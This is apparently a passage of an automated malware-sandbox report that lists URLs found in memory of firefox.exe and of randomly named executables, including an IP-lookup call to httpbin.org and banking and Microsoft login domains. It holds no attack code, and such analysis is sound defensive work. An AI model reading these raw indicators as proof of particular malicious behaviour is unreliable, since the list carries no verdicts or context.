Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3012755816.000001DEEAC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E730000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/private-browsing-web-api-fixes.jsaboutConfigPip
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881.browser
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp, 98a7b9f337.exe, 00000022.00000002.2946404134.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001C.00000003.2755657148.000001DEF0CC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967932562.000001D14F003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2997922183.000001DEEA4A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/3aaa7c43-9c88-40ac-93a5-c993
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755694462.000001DEEF0A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001C.00000003.2755694462.000001DEEF0D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yandex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rf
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E8C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.comhttps://truecolors.firefox.comhttps://support.mozilla.orgbrowser.tabs.dra
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
